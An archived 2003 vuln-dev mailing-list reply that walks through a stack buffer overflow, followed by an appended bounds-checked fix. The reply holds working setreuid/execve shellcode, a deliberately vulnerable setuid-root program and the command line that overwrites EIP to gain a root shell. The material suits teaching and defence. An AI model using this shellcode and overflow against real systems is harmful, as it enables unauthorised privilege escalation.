Vulnerability Development mailing list archives
Re: controlling ebp/eip of a frame, does it always lead to possible code execution?
From: Steven Hill <steve () covertsystems org>
Date: Fri, 19 Sep 2003 16:00:12 +1000 (EST)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 18 Sep 2003, Ingram wrote:

> Hello, again I have a little question about buffer overflows that I could not figure out by myself. If I can control what is written to ebp and eip, I thought that this would always be enough to execute shellcode... it seems not:
>
> ./exploit
> Segmentation fault (core dumped)
> gdb ./myprog ./myprog.core

Ingram,

Try these sample exploit command-line statements, as they should help you better understand what you are trying to achieve; then, if you prefer, browse over the attached exploit code.

[steve@covertsystems research]# cat > vuln.c << EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char buffer[1024];

    if(argc > 1)
        strcpy(buffer, argv[1]);

    return EXIT_SUCCESS;
}
EOF

[steve@covertsystems research]# cat > shell2string.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
    //setreuid(0, 0);
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
    //execve("/bin/bash", NULL)
    "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
    "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
    //exit(0);
    "x31\xc0\xb0\x01\xcd\x80";

int main(void)
{
    FILE *fp;
    int x;

    fp = fopen("shell.txt", "wb");
    for(x = 0; x < strlen(shell); x++)
        fprintf(fp, "%c", shell[x]);
    fclose(fp);

    return EXIT_SUCCESS;
}
EOF

[steve@covertsystems research]$ gcc shell2string.c
[steve@covertsystems research]$ ./a.out
[steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt
-rw-rw-r--    1 steve    steve          48 Aug  7 18:32 shell.txt
48 shell.txt
[steve@covertsystems research]$ od -ch shell.txt
0000000   1 300 260   F   1 333   1 311 315 200   1 300   P   j   h   h
           c031    46b0    db31    c931    80cd    c031    6a50    6868
0000020   /   b   a   s   h   /   b   i   n 211 343 215   T   $  \f   P
           622f    7361    2f68    6962    896e    8de3    2454    500c
0000040   S 215  \f   $ 260  \v 315 200   x   3   1 300 260 001 315 200
           8d53    240c    0bb0    80cd    3378    c031    01b0    80cd
0000060

[steve@covertsystems research]# sudo gcc vuln.c -o vuln
[steve@covertsystems research]# sudo chown root.root vuln
[steve@covertsystems research]# sudo chmod 4755 vuln
[steve@covertsystems research]# ls -l vuln
-rwsr-xr-x    1 root     root        11549 Aug  7 18:30 vuln

[steve@covertsystems research]$ export CODE=`cat shell.txt`
[steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}' > code.c ; gcc code.c -o code ; ./code ; rm -rf code*
0xbfffff84

[steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf "\x84\xff\xff\xbf";`
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@covertsystems research]# id
uid=0(root) gid=500(steve) groups=500(steve)
[root@covertsystems research]#

Happy Hacking!...

1036 == 1024 + 8[padding] + 4[EBP] + 4[EIP]

EIP shall point directly to the shellcode ENV address...

[steve@covertsystems research-1]$ gcc --version
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)

-- 
---=[ Covert Systems Research ]=-----------------------------//
 = www.covertsystems.org
 = Exploit Research & Development
 = Specializing in Linux & UNIX Systems
--------------------------------------------=[ SolarIce ]=---//
--The more one reads & learns, the less the other person knows.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE/apt1+SI9HWArYE4RAkUZAJoDHN4zfMnIqeGohvvjG+rm/MKpzQCdHOqI
qd6e7QwZcCZVOrDuTHo/Hco=
=7uzm
-----END PGP SIGNATURE-----
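As an added example that is not part of Steven's post or his attachments, here is the same vuln.c with the unchecked strcpy() replaced by a length-checked copy. The helper copy_arg() and the BUFSZ constant are names of my own, not libc calls; the point is that an argument which does not fit in the 1024-byte buffer is rejected, so the saved EBP and EIP that sit past the buffer (the bytes Ingram is asking about) can no longer be overwritten.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 1024   /* same buffer size as the vuln.c in the post */

/* Bounds-checked replacement for strcpy(buffer, argv[1]).
 * Added example; copy_arg() is a hypothetical name, not a libc function.
 * Returns 0 if src (including its terminating NUL) fits in dst, -1 otherwise.
 * On -1 dst is left as an empty string, never partially filled. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src without ever reading more than dstsz bytes of it. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)          /* n chars + NUL would need dstsz + 1 bytes */
        return -1;

    memcpy(dst, src, n + 1); /* n bytes plus the terminating NUL */
    return 0;
}

int main(int argc, char **argv)
{
    char buffer[BUFSZ];

    if (argc > 1) {
        if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
            fprintf(stderr, "argument too long (max %d bytes)\n", BUFSZ - 1);
            return EXIT_FAILURE;
        }
        printf("copied %zu bytes\n", strlen(buffer));
    }
    return EXIT_SUCCESS;
}
```

Rejecting the argument is deliberate: a plain strncpy(buffer, argv[1], sizeof buffer) would also stop the overwrite, but it does not NUL-terminate when the input fills the buffer, and silent truncation hides from the caller that the input was bad. Note also that the 1036-byte offset in the post is a property of one compiler's frame layout (gcc 3.2.2, no stack protector), and that the shellcode ran from an executable stack at a fixed environment address; stack canaries, non-executable stacks and ASLR in current toolchains each remove one of those assumptions, but none of them replaces the bounds check.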
Attachments: shell2string.c, vuln-1.c, exploit-1-1.c